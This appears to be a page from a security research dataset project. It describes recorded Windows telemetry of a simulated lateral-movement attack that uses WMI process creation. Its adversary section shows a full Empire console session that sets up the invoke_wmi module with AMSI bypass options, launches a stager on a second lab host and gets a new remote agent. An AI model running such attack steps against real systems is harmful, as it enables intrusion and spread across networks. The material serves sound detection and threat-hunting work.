Empire Invoke WMI
Contents
Empire Invoke WMI#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/21 |
Modification Date |
2020/09/22 |
Tactics |
|
Techniques |
|
Tags |
WMI IWbemServices ExecMethod |
Dataset Description#
This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http
AWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 2228 5/0.0 2020-09-21 04:06:27 http
(Empire: agents) > interact AWTK7BX5
(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http
(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_wmi) > info
Name: Invoke-WMI
Module: powershell/lateral_movement/invoke_wmi
NeedsAdmin: False
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@harmj0y
Description:
Executes a stager on remote hosts using WMI.
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True AWTK7BX5 Agent to run module on.
CredID False CredID from the store to use.
ComputerName True WORKSTATION6.theshire.lo Host[s] to execute the stager on, comma
cal separated.
Listener False http Listener to use.
Command False Custom command to run.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
UserName False [domain\]username to use to execute
command.
Password False Password to use to execute command.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/lateral_movement/invoke_wmi) > execute
[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT
[*] Agent AWTK7BX5 tasked with task ID 3
[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent EHUNP61R checked in
[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6
(Empire: powershell/lateral_movement/invoke_wmi) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http
AWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 2228 5/0.0 2020-09-21 04:14:58 http
EHUNP61R ps 172.18.39.6 WORKSTATION6 *THESHIRE\pgustavo powershell 9804 5/0.0 2020-09-21 04:14:56 http
(Empire: agents) > interact EHUNP61R
(Empire: EHUNP61R) > shell whoami
[*] Tasked EHUNP61R to run TASK_SHELL
[*] Agent EHUNP61R tasked with task ID 1
(Empire: EHUNP61R) >
theshire\pgustavo
..Command execution completed.
(Empire: EHUNP61R) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)